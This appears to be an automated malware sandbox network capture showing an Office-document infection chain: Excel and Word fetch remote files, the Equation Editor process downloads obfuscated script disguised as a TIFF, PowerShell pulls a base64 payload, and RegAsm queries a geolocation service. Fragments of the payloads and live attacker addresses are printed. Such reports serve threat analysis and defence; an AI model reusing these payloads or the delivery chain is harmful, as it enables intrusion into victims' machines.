                                                                              Data Ascii: 1f3 73df8b5c


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.2249169198.12.81.228803816C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              Aug 28, 2024 22:29:31.077141047 CEST281OUTHEAD /600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc HTTP/1.1
                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                              Host: 198.12.81.228
                                                                              Content-Length: 0
                                                                              Connection: Keep-Alive
                                                                              Aug 28, 2024 22:29:31.777801037 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 28 Aug 2024 20:29:31 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                              Last-Modified: Wed, 28 Aug 2024 10:41:36 GMT
                                                                              ETag: "17542-620bc0099129b"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 95554
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/msword
                                                                              Aug 28, 2024 22:29:31.778271914 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 28 Aug 2024 20:29:31 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                              Last-Modified: Wed, 28 Aug 2024 10:41:36 GMT
                                                                              ETag: "17542-620bc0099129b"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 95554
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/msword


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.2249170198.12.81.228803096C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              Aug 28, 2024 22:29:32.133135080 CEST345OUTGET /600/creatednewimagesinpicturebuttersmooth.tIF HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                              Host: 198.12.81.228
                                                                              Connection: Keep-Alive
                                                                              Aug 28, 2024 22:29:32.677210093 CEST1236INHTTP/1.1 200 OK
                                                                              Date: Wed, 28 Aug 2024 20:29:32 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                              Last-Modified: Wed, 28 Aug 2024 10:39:05 GMT
                                                                              ETag: "2caba-620bbf79601e3"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 182970
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: image/tiff
                                                                              Data Raw: ff fe 0d 00 0a 00 4b 00 63 00 61 00 7a 00 41 00 78 00 6d 00 78 00 55 00 41 00 20 00 3d 00 20 00 22 00 51 00 68 00 70 00 6a 00 62 00 41 00 62 00 57 00 68 00 4b 00 22 00 0d 00 0a 00 50 00 69 00 4c 00 4c 00 50 00 69 00 69 00 41 00 4f 00 57 00 20 00 3d 00 20 00 22 00 69 00 69 00 43 00 74 00 68 00 42 00 4c 00 4c 00 57 00 71 00 22 00 0d 00 0a 00 69 00 4c 00 68 00 55 00 69 00 57 00 7a 00 4a 00 67 00 6b 00 20 00 3d 00 20 00 22 00 7a 00 68 00 4c 00 4c 00 55 00 57 00 55 00 71 00 63 00 47 00 22 00 0d 00 0a 00 73 00 4c 00 4b 00 4b 00 6e 00 78 00 4b 00 57 00 72 00 5a 00 20 00 3d 00 20 00 22 00 61 00 68 00 4b 00 47 00 4f 00 47 00 47 00 5a 00 4f 00 54 00 22 00 0d 00 0a 00 41 00 70 00 4c 00 69 00 6f 00 4b 00 6f 00 66 00 75 00 68 00 20 00 3d 00 20 00 22 00 6d 00 4b 00 4e 00 62 00 52 00 57 00 50 00 4c 00 61 00 78 00 22 00 0d 00 0a 00 69 00 4e 00 57 00 57 00 7a 00 61 00 74 00 65 00 4e 00 57 00 20 00 3d 00 20 00 22 00 50 00 4e 00 70 00 6e 00 66 00 6d 00 5a 00 6c 00 63 00 47 00 22 00 0d 00 0a 00 75 00 6f 00 61 00 52 00 [TRUNCATED]
                                                                              Data Ascii: KcazAxmxUA = "QhpjbAbWhK"PiLLPiiAOW = "iiCthBLLWq"iLhUiWzJgk = "zhLLUWUqcG"sLKKnxKWrZ = "ahKGOGGZOT"ApLioKofuh = "mKNbRWPLax"iNWWzateNW = "PNpnfmZlcG"uoaRRGbpix = "WLlWqLcuoc"QNqLBnLZPe = "AegcNOedGz"lHeWUxGPlK = "LALfRKcTri"hmlUWmbLik = "osGcNcxWca"banaglyphaAqukeGl = "KKmLpufLhP"hWGNWZGidp = "anaglyphaqbofWkKZ"fAWBcHfmBc = "OiniifAheB"KzGLNiuvdp = "cUsfLUklkB"ILzenKohLS = "anaglyphaaWZKLfLk"RziBkSLbKv = "NlBxUkCeWi"mhq
                                                                              Aug 28, 2024 22:29:32.677228928 CEST1236INData Raw: 00 6b 00 6e 00 47 00 62 00 4c 00 57 00 71 00 20 00 3d 00 20 00 22 00 51 00 7a 00 4c 00 4e 00 75 00 6a 00 57 00 4c 00 6f 00 41 00 22 00 0d 00 0a 00 0d 00 0a 00 47 00 63 00 78 00 4c 00 57 00 4c 00 4b 00 68 00 70 00 4b 00 20 00 3d 00 20 00 22 00 4e
                                                                              Data Ascii: knGbLWq = "QzLNujWLoA"GcxLWLKhpK = "NCgcAWouGi"GoriuokNeR = "ekmakCWeKi"PcLccxLqoK = "NWLNZWfiKU"ploGdWUAfW = "
                                                                              Aug 28, 2024 22:29:32.677239895 CEST1236INData Raw: 00 57 00 6c 00 7a 00 22 00 0d 00 0a 00 43 00 48 00 5a 00 76 00 48 00 57 00 6e 00 68 00 57 00 68 00 20 00 3d 00 20 00 22 00 62 00 5a 00 68 00 64 00 68 00 78 00 55 00 7a 00 4c 00 57 00 22 00 0d 00 0a 00 67 00 63 00 41 00 4e 00 67 00 4f 00 47 00 4e
                                                                              Data Ascii: Wlz"CHZvHWnhWh = "bZhdhxUzLW"gcANgOGNGh = "bWJCccKfLe"LGdiedZGcG = "mcSQZcilrC"iikeKNPNAU = "eLieKTzUox"cqdPxGO
                                                                              Aug 28, 2024 22:29:32.677298069 CEST1236INData Raw: 00 68 00 47 00 4c 00 55 00 6c 00 75 00 65 00 6b 00 55 00 41 00 22 00 0d 00 0a 00 47 00 69 00 70 00 52 00 74 00 57 00 6a 00 57 00 47 00 47 00 20 00 3d 00 20 00 22 00 63 00 4b 00 61 00 4a 00 66 00 65 00 57 00 42 00 62 00 62 00 22 00 0d 00 0a 00 72
                                                                              Data Ascii: hGLUluekUA"GipRtWjWGG = "cKaJfeWBbb"rUWQAiWGke = "lWQTGrNKLv"QSGZcnNIJL = "eUcKWUaiZK"PGhiReALpL = "kpiZlIcKWi"
                                                                              Aug 28, 2024 22:29:32.677309990 CEST1236INData Raw: 00 6b 00 6b 00 6b 00 73 00 49 00 69 00 69 00 69 00 75 00 54 00 20 00 3d 00 20 00 22 00 69 00 6d 00 49 00 4e 00 52 00 70 00 69 00 47 00 63 00 75 00 22 00 0d 00 0a 00 48 00 62 00 57 00 47 00 74 00 69 00 4c 00 6d 00 61 00 47 00 20 00 3d 00 20 00 22
                                                                              Data Ascii: kkksIiiiuT = "imINRpiGcu"HbWGtiLmaG = "ZRKpNUpWPt"bWhWaftkmG = "liJjzcGkkS"kGolWRiRBW = "WiNitocbNO"uKdiNAiPvK
                                                                              Aug 28, 2024 22:29:32.677325010 CEST1236INData Raw: 00 6a 00 47 00 54 00 6b 00 22 00 0d 00 0a 00 0d 00 0a 00 52 00 6d 00 65 00 57 00 7a 00 47 00 61 00 4a 00 4c 00 73 00 20 00 3d 00 20 00 22 00 5a 00 4c 00 69 00 4f 00 6d 00 72 00 57 00 6d 00 57 00 4b 00 22 00 0d 00 0a 00 5a 00 4e 00 65 00 47 00 52
                                                                              Data Ascii: jGTk"RmeWzGaJLs = "ZLiOmrWmWK"ZNeGRCLWUL = "OeAkdcWKmK"efdnWcotWZ = "cuilhnosWO"tKGokTNcnT = "sWNBApLWLd"AzeG
                                                                              Aug 28, 2024 22:29:32.677335978 CEST1236INData Raw: 00 22 00 4c 00 57 00 52 00 53 00 65 00 4c 00 7a 00 5a 00 75 00 6b 00 22 00 0d 00 0a 00 75 00 61 00 63 00 4c 00 53 00 70 00 6d 00 65 00 65 00 63 00 20 00 3d 00 20 00 22 00 55 00 62 00 65 00 4c 00 57 00 4e 00 72 00 4e 00 50 00 53 00 22 00 0d 00 0a
                                                                              Data Ascii: "LWRSeLzZuk"uacLSpmeec = "UbeLWNrNPS"LniKifLpUW = "GUGqHkaLui"LKUrSvviUW = "CouOzdLOnr"WBxLzuCPid = "cfWpGNmbse"
                                                                              Aug 28, 2024 22:29:32.677391052 CEST1236INData Raw: 00 57 00 43 00 4b 00 57 00 20 00 3d 00 20 00 22 00 65 00 4c 00 69 00 65 00 47 00 49 00 4c 00 6d 00 50 00 6d 00 22 00 0d 00 0a 00 50 00 70 00 4f 00 49 00 74 00 61 00 5a 00 57 00 4e 00 48 00 20 00 3d 00 20 00 22 00 69 00 7a 00 75 00 6b 00 62 00 51
                                                                              Data Ascii: WCKW = "eLieGILmPm"PpOItaZWNH = "izukbQehcv"eRkiaqRkmW = "LfdppJBLvz"SJuIPKoWUb = "xZWcLoKWpR"KLaHWTuoLc = "UcaZW
                                                                              Aug 28, 2024 22:29:32.677406073 CEST1236INData Raw: 00 0a 00 47 00 6b 00 4b 00 66 00 4b 00 57 00 4a 00 69 00 47 00 62 00 20 00 3d 00 20 00 22 00 57 00 6f 00 57 00 51 00 47 00 43 00 47 00 47 00 69 00 62 00 22 00 0d 00 0a 00 4c 00 4c 00 50 00 4b 00 57 00 66 00 64 00 57 00 69 00 41 00 20 00 3d 00 20
                                                                              Data Ascii: GkKfKWJiGb = "WoWQGCGGib"LLPKWfdWiA = "oJbsaimurO"cWBkAoZCPG = "LWTNzNGbOb"rWUkPuTGlS = "PAipKiuikW"fupUTdeGhf
                                                                              Aug 28, 2024 22:29:32.677416086 CEST1236INData Raw: 00 63 00 61 00 47 00 75 00 63 00 4c 00 54 00 22 00 0d 00 0a 00 6f 00 73 00 4b 00 5a 00 65 00 4c 00 6d 00 4c 00 4e 00 75 00 20 00 3d 00 20 00 22 00 6b 00 62 00 6f 00 6f 00 70 00 4c 00 78 00 57 00 4c 00 71 00 22 00 0d 00 0a 00 6b 00 67 00 6b 00 4e
                                                                              Data Ascii: caGucLT"osKZeLmLNu = "kboopLxWLq"kgkNRioiIW = "UKpdzJBIOI"GeLLiKoGCg = "OUKLLAiZkl"PfGnWLtieW = "WkRqlUWBLs"Nxb
                                                                              Aug 28, 2024 22:29:32.685163021 CEST1236INData Raw: 00 20 00 3d 00 20 00 22 00 6b 00 42 00 4b 00 6b 00 70 00 4b 00 57 00 50 00 69 00 47 00 22 00 0d 00 0a 00 76 00 4c 00 6a 00 4f 00 54 00 69 00 62 00 69 00 6d 00 55 00 20 00 3d 00 20 00 22 00 52 00 4c 00 6b 00 4c 00 4a 00 63 00 68 00 49 00 4c 00 4e
                                                                              Data Ascii: = "kBKkpKWPiG"vLjOTibimU = "RLkLJchILN"kGWSLLCpqB = "gvmUcfxtib"WZtSpBnUki = "AgGpiNcRZL"bLsrqpCbLK = "hKKCeeWRG


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.2249172198.12.81.228802900C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Aug 28, 2024 22:29:39.463447094 CEST75OUTGET /600/RGGV.txt HTTP/1.1
                                                                              Host: 198.12.81.228
                                                                              Connection: Keep-Alive
                                                                              Aug 28, 2024 22:29:39.932537079 CEST1236INHTTP/1.1 200 OK
                                                                              Date: Wed, 28 Aug 2024 20:29:39 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                              Last-Modified: Wed, 28 Aug 2024 10:36:24 GMT
                                                                              ETag: "a1000-620bbee008703"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 659456
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: text/plain
                                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                              Aug 28, 2024 22:29:39.932552099 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                              Aug 28, 2024 22:29:39.932557106 CEST448INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                              Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                              Aug 28, 2024 22:29:39.932571888 CEST1236INData Raw: 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 32 77 73 4e 45 62 44 76 32 51 72 4e 73 61 44 70 32 77 70 4e 55 61 44 6a 32 51 6f 4e 38 5a 44 64 32 77 6d 4e 6b 5a 44 58 32 51 6c 4e 4d 5a 44 52 32 77 6a 4e 30 59 44
                                                                              Data Ascii: cDH3QxNMcDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8ZDd2wmNkZDX2QlNMZDR2wjN0YDL2QiNcYDF2wgNEUD/1QfNsXD51wdNUXDz1QcN8WDt1waNkWDn1QZNMWDh1wXN0VDb1QWNEQD/0QPNsTD50wNNUTDz0QMN8SDt0wKNkSDn0QJNMSDh0wHN0RDb0QGNcRDV0wENERDP0QDNsQDJzg0M8MDMzQyMYMDD
                                                                              Aug 28, 2024 22:29:39.932580948 CEST1236INData Raw: 67 62 4e 77 57 44 71 31 41 61 4e 59 57 44 6b 31 67 59 4e 41 57 44 65 31 41 58 4e 6f 56 44 59 31 67 56 4e 51 56 44 53 31 41 55 4e 34 55 44 4d 31 67 53 4e 67 55 44 47 31 41 52 4e 49 55 44 41 30 67 50 4e 77 54 44 36 30 41 4f 4e 59 54 44 30 30 67 4d
                                                                              Data Ascii: gbNwWDq1AaNYWDk1gYNAWDe1AXNoVDY1gVNQVDS1AUN4UDM1gSNgUDG1ARNIUDA0gPNwTD60AONYTD00gMNATDu0ALNoSDo0gJNQSDi0AIN4RDc0gGNgRDW0AFNIRDQ0gDNwQDK0ACNYQDE0gANAMD+zA/MoPD4zg9MQPDyzA8M4ODszg6MgODmzA5MIODgzg3MwNDazA2MYNDUzg0MANDOzAzMoMDIzgxMQMDCzAgM4LD8yguM
                                                                              Aug 28, 2024 22:29:39.932590961 CEST1236INData Raw: 4f 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 64 7a 41 33 4d 73 4e 44 61 7a 51 32 4d 67 4e 44 58 7a 67 31 4d 55 4e 44 55 7a 77 30 4d 49 4e 44 52 7a 41 30 4d 38 4d 44 4f 7a 51 7a 4d 77 41 44
                                                                              Data Ascii: ODpzA6McODmzQ5MQODjzg4MEODgzw3M4NDdzA3MsNDazQ2MgNDXzg1MUNDUzw0MINDRzA0M8MDOzQzMwADzwQMM8CDtwwKMkCDnwQJMMCDhwwHM0BDbwQGMcBDVwwEMEBDPwQDMsADJwwBMUADDwQAAAIAoAUAoA8D//Q/Ps/D5/w9PU/Dz/Q8P8+Dt/w6Pk+Dn/Q5PM+Dh/w3P09Db/Q2Pc9DV/w0PE9DP/QzPs8DJ/wxPU8DD
                                                                              Aug 28, 2024 22:29:39.932596922 CEST1236INData Raw: 77 61 50 4f 32 44 68 39 45 58 50 6d 74 44 56 36 55 63 4f 49 5a 54 2f 32 6f 73 4e 54 59 44 41 31 45 65 4e 53 58 54 71 31 55 5a 4e 74 55 6a 4a 31 38 52 4e 59 45 44 31 41 41 41 41 55 42 51 42 51 42 67 50 50 37 44 79 2b 45 70 50 4a 32 44 6c 36 6f 6d
                                                                              Data Ascii: waPO2Dh9EXPmtDV6UcOIZT/2osNTYDA1EeNSXTq1UZNtUjJ18RNYED1AAAAUBQBQBgPP7Dy+EpPJ2Dl6omOjpDL6QiMRFT5woFAAAAIAUAQAAAA/49PH/DN+ErPM0Tk90SPNwju8sjOamTu5caOVmjH4wOOcjT024uNdXj2yEoM5JzYy0kMyAD+AAAAABQBwAAAA8Dn/AgPB7jA7UYORhzb4AFOIcT+345NKdDQ2YvNubTm1EfN
                                                                              Aug 28, 2024 22:29:39.932671070 CEST1236INData Raw: 75 6a 56 36 45 76 4f 58 71 44 6a 36 38 6e 4f 63 70 6a 50 35 45 59 4f 34 67 7a 35 34 6f 4d 4f 32 69 54 4a 32 45 74 4e 43 5a 7a 49 32 51 51 4e 5a 54 7a 62 7a 49 30 4d 59 4d 6a 44 79 34 6b 4d 6b 49 44 42 78 45 64 4d 34 42 44 37 77 51 4f 41 41 41 41
                                                                              Data Ascii: ujV6EvOXqDj68nOcpjP5EYO4gz54oMO2iTJ2EtNCZzI2QQNZTzbzI0MYMjDy4kMkIDBxEdM4BD7wQOAAAAaAQAwAAAA/MzPr4zi+kmPO5DR+cQPt2zl8kPPGzzg8UDPrsDv7whOArTQ68hOCkzz5MbOCmDV4sMOvijh401NffTw3g5NvdDA2IuNDbTu2MqNEaTT1YdNGXzu1QZNbVDP0ALNASTY0UENFMz7zk2MYNzQzAhMuKzp
                                                                              Aug 28, 2024 22:29:39.932682037 CEST552INData Raw: 41 67 50 67 33 44 34 39 6b 42 50 2f 7a 44 37 38 49 4e 50 2f 79 54 70 37 63 37 4f 78 75 7a 48 36 6f 52 4f 69 6c 7a 57 35 41 55 4f 36 6b 7a 4d 35 55 53 4f 61 6b 7a 45 34 59 4f 4f 4e 6a 7a 4b 32 51 71 4e 68 59 44 42 31 77 66 4e 7a 58 7a 78 31 55 45
                                                                              Data Ascii: AgPg3D49kBP/zD78INP/yTp7c7OxuzH6oROilzW5AUO6kzM5USOakzE4YOONjzK2QqNhYDB1wfNzXzx1UEN0TD70kJNhJjBwgDMoAAAAQFAEAFA/M+Pk+TI+ImPI1z29AdP+2Du7cZO5nDU50wNtfTY3AkN1bT62UtNPbTx2orN2YjL2YiNXYTD2IQNOXjl08INURjFzo/MmPjmzY3M5Iz8yktMyKjfycjMuITHxgfMgHD2xwcM
                                                                              Aug 28, 2024 22:29:39.932693005 CEST1236INData Raw: 34 47 4d 6a 42 44 53 77 51 43 4d 49 41 41 41 41 67 4c 41 45 41 44 41 2f 59 76 50 66 36 54 67 2b 4d 6d 50 65 30 44 4e 39 63 53 50 58 30 6a 43 38 49 46 50 53 77 44 41 37 4d 2f 4f 6f 76 44 78 37 51 35 4f 48 75 54 62 37 49 67 4f 43 6e 7a 48 35 6f 77
                                                                              Data Ascii: 4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISNYXzw1kWNWQTCzsyMIID2xcMAAAATAQAIAszY4UxN4fjp3AkNoUza1ITNMQD0zM/MBID0yITMtHjuxgWM7EjDwwFAAAAMAQAEAAAA/c6P35TK9IePH2Te7EkO1lTS4kLOTijd3QoNeazN2QSNxXTwzciM
                                                                              Aug 28, 2024 22:29:39.937547922 CEST1236INData Raw: 4c 7a 77 79 45 71 4d 62 4b 54 6a 79 67 6f 4d 43 4b 44 66 79 59 6e 4d 78 4a 7a 61 79 55 6d 4d 66 4a 6a 57 79 51 6c 4d 4f 4a 44 53 79 4d 6b 4d 39 49 7a 4e 79 45 6a 4d 73 49 6a 4a 79 41 69 4d 61 49 54 46 79 38 67 4d 4a 49 7a 41 78 34 66 4d 34 48 6a
                                                                              Data Ascii: LzwyEqMbKTjygoMCKDfyYnMxJzayUmMfJjWyQlMOJDSyMkM9IzNyEjMsIjJyAiMaITFy8gMJIzAx4fM4Hj8xweMnHT4xsdMVHD0xocMEHjvxkbMzGTrxcaMiGDnxYZMQGzixUYM/FTexQXMuFDaxIWMdFzVxEVMLFjRxAUM6EDNx8SMpEzIx0RMYEjExwQMGETAwsPM1Dz7woOMkDj3wgNMTDTzwcMMBDDvwYLMwCjqwUKMfCTm


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.2249175178.237.33.50802496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Aug 28, 2024 22:29:42.035069942 CEST71OUTGET /json.gp HTTP/1.1
                                                                              Host: geoplugin.net
                                                                              Cache-Control: no-cache
                                                                              Aug 28, 2024 22:29:42.678433895 CEST1170INHTTP/1.1 200 OK
                                                                              date: Wed, 28 Aug 2024 20:29:42 GMT
                                                                              server: Apache
                                                                              content-length: 962
                                                                              content-type: application/json; charset=utf-8
                                                                              cache-control: public, max-age=300
                                                                              access-control-allow-origin: *
                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.224916188.99.66.384433604C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-08-28 20:29:19 UTC321OUTGET /UlEYs1 HTTP/1.1
                                                                              Accept: */*
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                              Host: zhort.de
                                                                              Connection: Keep-Alive
                                                                              2024-08-28 20:29:19 UTC581INHTTP/1.1 302 Found
                                                                              Server: openresty
                                                                              Date: Wed, 28 Aug 2024 20:29:19 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 191
                                                                              Connection: close
                                                                              X-DNS-Prefetch-Control: off
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                              X-Download-Options: noopen
